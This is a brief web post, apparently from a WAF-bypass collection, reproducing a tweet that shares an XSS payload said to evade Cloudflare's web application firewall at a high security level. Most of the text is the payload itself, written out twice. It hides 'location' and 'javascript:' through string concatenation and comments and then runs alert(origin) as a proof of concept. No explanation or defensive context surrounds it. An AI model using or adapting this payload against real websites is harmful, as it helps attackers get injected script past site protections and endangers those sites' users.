WAF bypass by AtaTurk1925 – Web application firewalls bypasses collection and testing tools

A bypass payload for XSS targeting CloudFlare WAF (specifically when security level is high) was shared in the tweet. The payload is: javascript:window/*Ata*/[%27loc%27%2b%27ati%27%2b%27on%27]%3d%27java%27%2b%27scr%27%2b%27ipt:%27%2blocation/*#*/;alert(origin). This payload can bypass CloudFlare WAF's security measures. More details can be found in the tweet: https://t.co/D0JWiCMBex

XSS WAF BYPASS PAYLOADS
??
CloudFlare WAF (when security level high):

javascript:window/*Ata*/[%27loc%27%2b%27ati%27%2b%27on%27]%3d%27java%27%2b%27scr%27%2b%27ipt:%27%2blocation/*#*/;alert(origin) pic.twitter.com/D0JWiCMBex

— nader abdi (@AtaTurk1925) June 17, 2024